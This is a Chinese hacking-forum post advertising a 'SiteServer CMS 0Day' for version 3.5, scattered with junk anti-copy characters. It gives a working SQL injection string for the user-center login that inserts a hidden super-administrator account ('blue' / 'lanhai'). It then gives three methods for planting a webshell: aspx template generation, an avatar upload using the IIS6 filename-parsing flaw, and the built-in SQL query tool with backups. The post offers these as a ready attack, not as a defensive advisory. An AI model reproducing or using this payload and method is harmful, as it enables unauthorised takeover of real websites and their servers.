SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
; x# K* ?0 ~- X3 w0 i
stieserver官网:www.siteserver.cn

: ]0 W- F- O5 w3 d

$ @$ c2 O( K; ^3 AEXP:
% {- d1 _: E2 o) v
直接访问UserCenter/login.aspx
$ O* l' O7 a7 _% _$ G
. z) U6 G0 y1 N

用户名处输入：
$ U$ [  Y3 a3 w. P. R
/ i9 e% |6 D9 y+ ?123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

  z7 ]7 u- \4 g4 _2 r; A

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

3 h% P# v- U7 I9 P3 |
2 A4 O$ r* Q) F
: i) O- L: g) s- G% l) w之后再访问后台SiteServer/login.aspx用插入的用户登陆
! C) A# z) |  p+ d8 `+ P/ \

* q! P6 I' S" c* X9 E8 Y
后台拿webshell的三种方法：

一、
' N% c( X1 f4 W4 A
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

1 ]+ s6 X6 F2 r9 D9 Q二、
& `4 H% O% G$ s2 ]0 L
成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
% E) J6 p4 e9 B* K
# A2 z1 v9 q; W+ `用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、
8 y5 Q" U( u1 }) R' D# [& c$ ?
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

2 R8 _% F7 B6 [( p系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

9 |, E/ p0 N' G2 M